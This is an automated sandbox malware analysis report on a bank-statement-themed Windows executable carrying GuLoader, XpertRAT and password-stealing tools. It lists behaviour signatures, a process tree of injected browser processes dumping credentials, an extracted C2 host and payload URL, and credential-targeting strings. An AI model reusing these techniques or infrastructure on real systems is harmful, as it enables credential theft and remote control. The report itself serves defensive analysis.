Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Statement from QNB.exe

Overview

General Information

Sample Name:Statement from QNB.exe
Analysis ID:527846
MD5:9c8b626668e14aeb4355ea39d1520e33
SHA1:554069b1fb3a80a02840158d31c6c2826812cb40
SHA256:d63ed0450efe28d525954d84556394f21df1c2d882e74b4891492fefab00dd79
Infos:

Most interesting Screenshot:

Detection

GuLoader MailPassView XpertRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Yara detected MailPassView
Yara detected XpertRAT
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Writes to foreign memory regions
Tries to detect Any.run
Yara detected VB6 Downloader Generic
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Disables user account control notifications
Tries to steal Mail credentials (via file registry)
Changes security center settings (notifications, updates, antivirus, firewall)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected WebBrowserPassView password recovery tool
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Disables UAC (registry)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • Statement from QNB.exe (PID: 1112 cmdline: "C:\Users\user\Desktop\Statement from QNB.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • Statement from QNB.exe (PID: 3232 cmdline: "C:\Users\user\Desktop\Statement from QNB.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
      • iexplore.exe (PID: 1736 cmdline: C:\Users\user\Desktop\Statement from QNB.exe MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 2300 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 3544 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 2448 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 1968 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
        • iexplore.exe (PID: 5684 cmdline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt" MD5: BBF55D48A97497F61781C226E1CEDE6A)
  • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 6920 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
  • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
  • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
    • D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe (PID: 1316 cmdline: "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" MD5: 9C8B626668E14AEB4355EA39D1520E33)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1y{\\"}

Threatname: XpertRAT

{"C2 list": ["z1s.us.to:5344"], "Mutex": "D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4", "Group": "Test", "Name": "Xpert", "Version": "3.0.10", "Password": "root"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000003.81136331884.0000000005E20000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0xa660:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpJoeSecurity_GenericDropperYara detected Generic DropperJoe Security
      00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpJoeSecurity_XpertRATYara detected XpertRATJoe Security
        00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Click to see the 47 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.0.iexplore.exe.400000.1.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            16.2.iexplore.exe.400000.0.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              12.2.iexplore.exe.400000.0.unpackJoeSecurity_GenericDropperYara detected Generic DropperJoe Security
                12.2.iexplore.exe.400000.0.unpackJoeSecurity_XpertRATYara detected XpertRATJoe Security
                  12.3.iexplore.exe.5f1a8d8.3.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                    Click to see the 45 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1y{\\"}
                    Source: 12.0.iexplore.exe.400000.3.unpackMalware Configuration Extractor: XpertRAT {"C2 list": ["z1s.us.to:5344"], "Mutex": "D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4", "Group": "Test", "Name": "Xpert", "Version": "3.0.10", "Password": "root"}
                    Source: 12.0.iexplore.exe.400000.3.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.0.iexplore.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
                    Source: 16.0.iexplore.exe.400000.1.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 12.2.iexplore.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.0.iexplore.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen
                    Source: 16.0.iexplore.exe.400000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 12.0.iexplore.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                    Source: 12.0.iexplore.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
                    Source: 16.0.iexplore.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.0.iexplore.exe.400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.0.iexplore.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: 16.0.iexplore.exe.400000.5.unpackAvira: Label: SPR/Tool.MailPassView.473
                    Source: Statement from QNB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
                    Source: Binary string: z:\Projects\VS2005\mspass\Release\mspass.pdb source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: iexplore.exe, iexplore.exe, 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\Dialupass\Release\Dialupass.pdb source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: .pdba source: iexplore.exe, 0000000C.00000003.81100972595.0000000005EA1000.00000004.00000001.sdmp
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00406EC3
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00408752 FindFirstFileW,FindNextFileW,wcslen,wcslen,17_2_00408752
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_004080D9 FindFirstFileW,FindNextFileW,FindClose,17_2_004080D9
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 18_2_0040423A FindFirstFileA,FindNextFileA,18_2_0040423A
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 20_2_0040537B FindFirstFileW,FindNextFileW,wcslen,wcslen,20_2_0040537B

                    Networking:

                    barindex
                    C2 URLs / IPs found in malware configurationShow sources
                    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1y{\
                    Source: Malware configuration extractorURLs: z1s.us.to:5344
                    Source: Joe Sandbox ViewASN Name: DATACENTERRO DATACENTERRO
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficTCP traffic: 192.168.11.20:49806 -> 194.85.248.156:5344
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxloginshostnameencryptedUsernameencryptedPasswordusernameFieldpasswordFieldhttpRealmnullSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitelogins.jsonnetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_c7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmpString found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.facebook.com (Facebook)
                    Source: iexplore.exe, 00000011.00000003.81166493558.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166329896.000000000387B000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81171103182.000000000387B000.00000004.00000001.sdmpString found in binary or memory: amingoverlay:///ms-gamingoverlay://kglcheck/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/logint equals www.yahoo.com (Yahoo)
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: iexplore.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: Statement from QNB.exe, 00000004.00000003.80970084976.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018482063.000000000088D000.00000004.00000020.sdmp, Statement from QNB.exe, 00000004.00000003.80966375673.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961766607.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80961024720.000000000088D000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: bhvD2BB.tmp.17.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.com
                    Source: iexplore.exe, 0000000E.00000002.81115436732.00000000007C9000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.com/
                    Source: iexplore.exe, 0000000E.00000003.81114391201.00000000032CD000.00000004.00000001.sdmp, iexplore.exe, 0000000E.00000003.81114359568.00000000032CD000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.comata
                    Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
                    Source: Statement from QNB.exe, 00000004.00000003.80961383094.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81485897734.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81568642879.0000000000A93000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
                    Source: Statement from QNB.exe, 00000004.00000003.80967593583.000000000088D000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/
                    Source: Statement from QNB.exe, 00000004.00000002.81018352703.000000000087F000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/%%doc-00-5k-docs.googleusercontent.com
                    Source: Statement from QNB.exe, 00000004.00000003.80962048215.00000000008C3000.00000004.00000001.sdmp, Statement from QNB.exe, 00000004.00000002.81018228293.0000000000871000.00000004.00000020.sdmpString found in binary or memory: https://doc-00-5k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578885460.0000000000A95000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81572159339.0000000000A92000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81571978022.0000000000A86000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000003.81574632157.0000000000A95000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
